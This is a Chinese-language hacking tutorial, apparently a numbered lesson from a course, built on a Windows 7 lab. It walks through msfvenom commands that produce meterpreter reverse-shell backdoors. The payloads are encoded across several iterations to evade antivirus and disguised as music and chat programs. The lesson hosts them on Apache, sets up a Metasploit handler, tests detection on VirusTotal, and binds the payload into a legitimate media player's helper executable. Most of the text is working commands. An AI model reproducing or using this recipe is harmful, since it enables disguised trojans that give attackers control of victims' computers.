第四十三课测试后门程序对 Windows危害

1我们在上一本书上面也说过。这一本书我们也来再说一遍。但是不同的是。我们要用msfvenom这款工具来进行测试

　　测试的系统是windows7

　　我们打开kalj终端输入这条命令

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/

　　这里我给大家解释一下命令的意思

-a 指定架构如 x86 x64。 x86 代表 32 位， x64 代表 64 位。 32 位软件可以在 64 位系统上运 行。所以我们生成 32 位的后门，这样在 32 位和 64 位系统中都可以使用。

--platform 指定平台，这里选择 windows，通过 --l platforms 可以查看所有支持的平台 -p 设置攻击载荷，我们使用 windows/meterpreter/reverse_tcp，可以通过-l payloads 查看所有攻击载荷 LHOST 目标主机执行程序后连接我们 Kali 的地址

LPORT 目标主机执行程序后连接我们 Kali 的端口

，-b 去掉坏字符，坏字符会影响 payload 正常执行。

-e 指定编码器，也就是所谓的免杀，x86/shikata_ga_nai 是 msf 自带的编码器，可以通过 -l encoders 查看所有编码器

-i 指定 payload 有效载荷编码迭代次数。 指定编码加密次数，为了让杀毒软件，更难查出源代码

-f 指定生成格式，可以是 raw，exe，elf，jar，c 语言的，python 的，j**a 的……，用 -l formats 查看所有支持的格式

-o 指定文件名称和导出位置。 指定到网站根目录/var/www/html，方便在肉机上下载后门程序

　　我这里取名为QMusic.exe如图1-1

图1-1

　　开启apache服务

systemctl start apache2

　　打开win7下载如图1-2

图1-2

　　在kali上打开metasploit

　　msfconsole

　　使用exploit/mulit/handler模块并进行设置

use exploit/multi/handler

set LHOST 对应的IP

set LPORT 对应的端口

set payload windows/meterpreter/reverse_tcp

　　run

　　在win7上，打开下载好的软件进行运行如图1-3

图1-3

　　kali已经成功获取了win7的权限如图1-4

图1-4

　　我们可以对后门软件进行二次编译来提高免杀率

msfvenom -a x86 --platform windows -p windows/meterpreter如图1-5

图1-5

　　这里我取名为QQ.exe

　　我们打开：https://www.virustotal.com/

　　如图1-6

图1-6

　　依次选择两个后门软件 如图1-7

图1-7

　　编译一次比编译两次提升了免杀率

　　模拟黑客给真正的软件加上后门获取shell

　　先下载一个正常的播放软件如图1-8

图1-8

先查看主程序会调用哪些附加的小程序，然后把 payload 后门和这些小程序绑定到一起。

当然也可 以直接加到主程序上，但是加主程序上，有时报错。

当 QvodPlayer.exe 主程序运行时，会自动调用 QvodTerminal.exe 这个小程序。

　　所以我们决定将后门绑定在QvodTerminal.exe

　　将QvodTerminal.exe上传到kali

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -x

QvodTerminal.exe -f exe -o /var/www/html/QvodTerminal.exe

　　将该文件下载并替换掉原来的文件如图1-9

图1-9

　　打开运行后发现QvodTerminal.exe已经运行如图2-1

图2-1

　　kali使用handler进行监听如图2-2

图2-2

　　到此为止已经获得管理员权限